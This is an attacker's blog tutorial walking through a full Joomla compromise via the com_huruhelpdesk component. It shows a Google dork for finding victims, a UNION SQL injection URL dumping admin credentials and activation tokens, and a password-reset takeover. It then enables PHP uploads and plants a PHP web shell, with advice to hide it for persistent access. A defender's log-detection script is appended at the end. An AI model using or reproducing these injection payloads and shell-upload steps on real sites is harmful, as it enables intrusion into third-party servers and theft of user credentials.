
Step by step SQL Injection: Joomla

by poetra, at 16.25, 0 comments

* title : exploit joomla : com_huruhelpdesk + reset password + install php shell

* author : ho1onk

* site : http://ho1onk.fairtopic.com

**************************************************************************************



============= INTRODUCTION ============

Especially for those of you who don't like downloading things or who have a slow, laggy connection, this might be a solution.

=======================================



==========

[+] step 1

==========

Open Google.. type the keyword

Code:

“inurl:/index.php?option=com_huruhelpdesk\”

Test them one by one.

Let's take this one.

==========

[+] step 2

==========

Apply the exploit..

Code:

/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7+from+jos_users–
There's the admin… :P

It shows up..

==========

[+] step 3

==========

Let's try resetting the password.

Code:

/index.php?option=com_user&view=reset
Hm.. it asks for an email.. just enter the admin email from earlier..

Enter..

==========

[+] step 4

==========

Now it asks for the activation as well.

Hmm.. now what?

Relax.. let's look up the activation first.

Code:

/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password,0x3a,email,0x3a,activation),5,6,7+from+jos_u ​sers–
There, the activation comes out.

hehehe

:)

Moving on…

Just copy-paste it into the earlier form.. enter.. :)

==========

[+] step 5

==========

Just copy-paste it into the earlier form.. enter.. :)

:P

==========

[+] step 6

==========

hahaha

It asks for a new password.. just give it one..

hehehe

==========

[+] step 7

==========

OK, now go straight into the admin panel..

:)

Code:

http://[site]/[pacth]/administrator
hahaha

==========

[+] step 8

==========

We're in, as it turns out.. heheh

Patience, patience..

Now.. here you first have to change the “Global configuration”

and after that go into the “media manager”

==========

[+] step 9

==========

So.. we go to Global configuration first

Change the media settings, just add php

Don't forget to save..

:D

==========

[+] step 10

==========

OK

Moving on..

Open the media manager..

Now, this is the last stage..

Upload your PHP shell..

hahaha :)

Right, done..

If no red text appears, it worked..

Our shell is here

Code:

http://[site]/[pacth]/images/namashell.php
OK, now it's up to you.. what you do with the site..

My advice.. if possible..

upload the shell again to another directory..

then delete the shell in the images directory from before..

That's all for now

Good luck trying.. :D
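
For defenders, the request sequence in steps 2 to 10 leaves a recognizable trail in the web server's access log. The following is an added example, not part of the original post: it flags clients that send a non-numeric cid to com_huruhelpdesk, then open the com_user reset view, then successfully fetch a .php file under images/. The log lines, the combined log format, and the names classify and find_chains are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (not from a real site); addresses are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2013:10:00:01 +0000] "GET /index.php?option=com_huruhelpdesk&view=detail&cid[0]=12 HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2013:10:02:11 +0000] "GET /index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3 HTTP/1.1" 200 4312
203.0.113.9 - - [01/Jan/2013:10:03:40 +0000] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 2950
203.0.113.9 - - [01/Jan/2013:10:09:30 +0000] "GET /images/namashell.php HTTP/1.1" 200 812
192.0.2.44 - - [01/Jan/2013:11:00:00 +0000] "GET /images/test.php HTTP/1.1" 404 210
"""
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')
ORDER = ["sqli", "reset", "php_in_images"]  # stages in the order the write-up performs them

def classify(url):
    """Return which stage of the chain a request URL matches, or None."""
    parts = urlsplit(url)
    q = parse_qs(parts.query, keep_blank_values=True)
    option = q.get("option", [""])[0].lower()
    if option == "com_huruhelpdesk":
        # cid[...] is a record id, so any value that is not plain digits is tampering.
        for key, values in q.items():
            if key.lower().startswith("cid") and not all(re.fullmatch(r"[0-9]+", v) for v in values):
                return "sqli"
    if option == "com_user" and q.get("view", [""])[0].lower() == "reset":
        return "reset"
    if re.search(r"/images/.*\.php$", unquote(parts.path), re.I):
        return "php_in_images"
    return None

def find_chains(log_text):
    """Return {client_ip: stages} for clients that hit every stage in ORDER."""
    seen = {}
    for m in filter(None, map(LINE.match, log_text.splitlines())):
        ip, url, status = m.groups()
        stage = classify(url)
        # A .php under images/ only counts when the server actually served it.
        if stage is None or (stage == "php_in_images" and status != "200"):
            continue
        seen.setdefault(ip, []).append(stage)
    hits = {}
    for ip, stages in seen.items():
        it = iter(stages)
        if all(s in it for s in ORDER):  # ORDER must appear as a subsequence
            hits[ip] = stages
    return hits

if __name__ == "__main__":
    for ip, stages in find_chains(SAMPLE_LOG).items():
        print(ip, "->", " > ".join(stages))
```

Any single stage is worth an alert on its own; the full ordered chain from one client indicates the account takeover and upload described above has probably succeeded.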

